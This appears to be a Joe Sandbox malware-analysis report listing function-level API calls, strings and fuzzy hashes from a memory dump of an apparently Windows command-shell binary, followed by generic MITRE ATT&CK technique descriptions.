Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CreateSemaphore
String ID: _p0$wil
API String ID: 1078844751-1814513734
Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
Instruction ID: 807a6166325d229a64678048fc2fb4d0acbe51463ae9e2531c857805f3190301
Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
Instruction Fuzzy Hash: B151E462B1974283EE65AF14A0646B9A2A0FF84B92FF44479DA0D07F81DEBCE405C320

Function 00007FF7823FFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FFBC1

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FFC58
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FFD01

Strings

%5lu, xrefs: 00007FF7823FFCB0

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DiskFreeSpace
String ID: %5lu
API String ID: 2448137811-2100233843
Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
Instruction ID: 0afc16e2bfb4d411225d278d638f57aff3b26d6d70b1309a27d0be1a8d754725
Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
Instruction Fuzzy Hash: B141C436708AC195EB61EF11E8546EAB760FB84789F908035EE4D0BB98DFBCD549C710

Function 00007FF782400774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7824007DA

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

_wcslwr.MSVCRT ref: 00007FF78240085B
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7824008A9

Strings

[%s], xrefs: 00007FF78240080F

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$_wcslwr
String ID: [%s]
API String ID: 886762496-302437576
Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
Instruction ID: d956c273e2db525fb479cb8311d6e96c983df4b7e19b9383450a590d8e62bbe0
Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
Instruction Fuzzy Hash: BA319C32709B8285EB61EF21D8503E9A7A0FB88B89F944035CE8D4BB55DF7CD685C310

Function 00007FF7823F73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823F73DF
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823F73F5

Strings

RaiseFailFastException, xrefs: 00007FF7823F73EE
kernelbase.dll, xrefs: 00007FF7823F73D5

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RaiseFailFastException$kernelbase.dll
API String ID: 1646373207-919018592
Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
Instruction ID: 0aa17d8f637b380250e31f0675de3535c99a08ec9a724d7223741cafe54ece68
Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
Instruction Fuzzy Hash: 9FF03A21B18B8192EA40AB12F444079FE60FF89BD2B98D175DA4E03B14CFBCD885C720

Function 00007FF7823E4878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF7823E48DE
_wcsnicmp.MSVCRT ref: 00007FF7823E48FF
wcschr.MSVCRT(?,?,?,00007FF7823EED49), ref: 00007FF7823E493E

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
Instruction ID: e054e8a615b3190133d4921d067e75a7b293fbac020b45e761d7782526e41fd3
Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
Instruction Fuzzy Hash: 5751B31AE08642A1EB507F11D420179E7A0FF54B92FE88079DA0E07ED5DEACD889C370

Function 00007FF7823FF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FF3B5

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FF401
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FF442
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FF468

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DriveFullNamePathType
String ID:
API String ID: 3442494845-0
Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
Instruction ID: 67b8f34c99b1c808fc4e9e905cf9277b940ddb33a9d92cfd28027be3a76764d2
Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
Instruction Fuzzy Hash: E731BE32719BC28AEB60DF21E8507E9B7A4FB88B85F944079EA4D47B94CF38D645C710

Function 00007FF7823E8F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF7823E8FF3
RtlLookupFunctionEntry.NTDLL ref: 00007FF7823E9012
RtlVirtualUnwind.NTDLL ref: 00007FF7823E905F
__raise_securityfailure.LIBCMT ref: 00007FF7823E9144

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
Instruction ID: 1866bf5a4e4f806cbaddde4cf0c7080a1406db92ba7b3f957dec2df49e21cb62
Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
Instruction Fuzzy Hash: B041DC35A08B41D5EB90AB08F850365B764FB88755FE04139DA8D47B64DFBEE889C730

Function 00007FF7823D4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823F29C4
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F29E9
_get_osfhandle.MSVCRT ref: 00007FF7823F2A22
SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F2A39

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$TimeWrite
String ID:
API String ID: 4019809305-0
Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
Instruction ID: 3da9f059d3bc814d8a505bba42161ef8f92b5d5c4a9eaced987106a50dc09be9
Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
Instruction Fuzzy Hash: D131C122A0874282FBA06B15B450379EBA0BF49B52FA4527DDD0D53FE5CFBCD854C620

Function 00007FF7823E8470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON

Download Yara Rule

APIs

wcstol.MSVCRT ref: 00007FF7823E848E
wcstol.MSVCRT ref: 00007FF7823E84A8
lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0 ref: 00007FF7823E853F

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcstol$lstrcmp
String ID:
API String ID: 3515581199-0
Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
Instruction ID: fe0350bc71b218975c3e115c69ccdacf3f7c003035c8abe618f73bced4b07d5d
Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
Instruction Fuzzy Hash: 0021DC36F0874293E6606B79D464139EBA1FF49741FE56078CB4F43EA4CEACE449C620

Function 00007FF7823FE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FE836
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE855
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FE877
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE8AE

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
Instruction ID: 0429a3c7fb78fdabe04ebd5097b80ba9f651f80460c3eb98939ff4fe5c70b7db
Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
Instruction Fuzzy Hash: 2D212F31A1874687EB547B11A41027DFAA1FB84B82FF44179D94E47B95CFBCE841CB21

Function 00007FF7823FCFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD01C
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD033
FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD06D
SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD07F

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
Instruction ID: de6de2ae812801f4b2c894766858642836a50032c6c44774fa09d1f592f4715b
Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
Instruction Fuzzy Hash: 1711B232618A4287DB449B21F01417AFBE0FB8AB96F905135EA8E47F94DF7CC485CB20

Function 00007FF7823DE420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762

Part of subcall function 00007FF7823DEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
Part of subcall function 00007FF7823DEF40: wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
Part of subcall function 00007FF7823DEF40: iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6

longjmp.MSVCRT ref: 00007FF7823ECCBC
longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ECCE0

Strings

GeToken: (%x) '%s', xrefs: 00007FF7823ECC39, 00007FF7823ECCF2

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
String ID: GeToken: (%x) '%s'
API String ID: 3282654869-1994581435
Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
Instruction ID: 7b61cd67e8ddcab2408ed8c424b529c9d82f845491704bd68626486734819176
Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
Instruction Fuzzy Hash: 4C61E361B0924282FA14AB21D4681B9E6A1FF44796FF44978D91D07EE1EEBCF844C330

Function 00007FF7823F9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F97D0

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F98D7

Strings

Software\Classes, xrefs: 00007FF7823F97C2

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
String ID: Software\Classes
API String ID: 2714550308-1656466771
Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
Instruction ID: 9cbb85585f40519163b0444a0941b5d3509c249f7fa24e79b5e04da4bbecdc79
Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
Instruction Fuzzy Hash: 7241D722B0975281EE40FB16E46403DA3A4FB84BD1FA08179DE5E47BE1DFB9D896C350

Function 00007FF7823D3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF7823D3C85

Strings

/-Y, xrefs: 00007FF7823F184D

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmp
String ID: /-Y
API String ID: 1886669725-4274875248
Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
Instruction ID: 18477bbde160ddcd8c627ee1f678d1d662a39ffca535e3de15e589d01ce1668e
Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
Instruction Fuzzy Hash: 21219766E0875581FA10AB12A554278FAA0BB44FC2FA44475DE8D07B94DFBCECC2D720

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
